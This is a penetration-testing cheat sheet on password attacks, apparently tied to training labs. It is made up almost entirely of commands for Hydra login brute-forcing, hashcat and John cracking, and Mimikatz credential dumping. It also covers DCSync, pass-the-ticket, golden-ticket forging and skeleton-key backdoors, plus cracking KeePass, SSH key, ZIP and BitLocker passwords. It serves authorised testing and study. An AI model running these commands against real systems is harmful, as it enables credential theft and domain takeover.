Password Attacks

Password Attacks

Identify a hash

hash_identifier
hashid <hash>

DonPAPI

DonPAPI <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST>
DonPAPI -local_auth <USERNAME>@<RHOST>
DonPAPI --hashes <LM>:<NT> <DOMAIN>/<USERNAME>@<RHOST>
DonPAPI -laps <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST>

Group Policy Preferences (GPP)

gpp-decrypt

python3 gpp-decrypt.py -f Groups.xml
python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYYw/NglVmQ

Hash Cracking

Hashcat

Hash Cracking

Custom Rules

Rule Based Attack

Add a 1 to each Password

echo \$1 > <FILE>.rule

Capitalize first character

$1
c

Add nothing, a 1 or a ! to an existing Wordlist

:
$1
$!

Rule for upper case Letter, numerical Value and special Character

• $1 > appends a "1"

• $2 > appends a "2"

• $3 > appends a "3"

• c > Capitalize the first character and lower case the rest

$1 c $!
$2 c $!
$1 $2 $3 c $!

Rule Preview

hashcat -r <FILE>.rule --stdout <FILE>.txt

Save into a new wordlist

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

Generating wordlists using CeWL

cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist

Hydra

hydra <RHOST> -l <USERNAME> -p <PASSWORD> -s <PORT> ssh://<ip>
hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> <PROTOCOL>
hydra <RHOST> -C <valid_credentials> ftp

Brute force login http / https

hydra -L <users> -P <wordlist> <RHOST> http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"
hydra -C <valid_creds> <RHOST> http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"

hydra -L <users> -P <wordlist> <RHOST> https-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"
hydra -C <valid_creds> <RHOST> https-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"

Brute force Baisc Auth authentication

Note the server response for invalid logins, in this case the server responded HTTP 401 (this is the flag F=)

hydra -I -l admin -P /usr/share/wordlists/rockyou.txt "http-get://192.168.115.201/:A=BASIC:F=401"

John

Hash Cracking

john <FILE> --wordlist=/PATH/TO/WORDLIST/<WORDLIST> --format=crypt
john <FILE> --rules --wordlist=/PATH/TO/WORDLIST/<WORDLIST
john --show <FILE>

Mimikatz

Common Commands

token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>

Dump Hashes

.\mimikatz.exe
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
meterpreter > getprivs
meterpreter > creds_all
meterpreter > golden_ticket_create

Pass the Ticket

.\mimikatz.exe
sekurlsa::tickets /export
kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi
klist
dir \\<RHOST>\admin$

Forging Golden Ticket

.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
klist
dir \\<RHOST>\admin$

Skeleton Key

privilege::debug
misc::skeleton
net use C:\\<RHOST>\admin$ /user:Administrator mimikatz
dir \\<RHOST>\c$ /user:<USERNAME> mimikatz

Cracking Password Managers

Keepass

keepass2john Database.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

keepass2john Database.kdbx > keepass.hash
john keepass.hash --wordlist=/usr/share/wordlists/rockyou.txt

PasswordSafe

pwsafe2john <FILE> > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Cracking SSH id_rsa password

ssh2john id_rsa > ssh.hash
hashcat -m 22921 ssh.hash /usr/share/wordlists/rockyou.txt --force

ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

Custom rules

[List.Rules:sshRules]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#

sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash

Cracking ZIP password

locate *2john*

zip2john file.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

Cracking openssl encrypted GZIP files

$ file GZIP.gzip 

GZIP.gzip: openssl enc'd data with salted password

for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null| tar xz;done

Once the for loop has finished, we can check the current directory for a newly extracted file.

Cracking BitLocker-encrypted drives

bitlocker2john -i Backup.vhd > backup.hashes
grep "bitlocker\$0" backup.hashes > backup.hash
cat backup.hash

hashcat -a 0 -m 22100 backup.hash /usr/share/wordlists/rockyou.txt

After successfully cracking the password, we can access the encrypted drive.

Mounting the Bitlocker-encrypted drives

First, we need to install the package using apt:

sudo apt-get install dislocker

Next, we create two folders which we will use to mount the VHD.

sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount

We then use losetup to configure the VHD as loop device, decrypt the drive using dislocker, and finally mount the decrypted volume:

sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p1 -u<password> -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount

If everything was done correctly, we can now browse the files:

cd /media/bitlockermount/
ls -la

Once we have analyzed the files on the mounted drive, we can unmount it using the following commands:

sudo umount /media/bitlockermount
sudo umount /media/bitlocker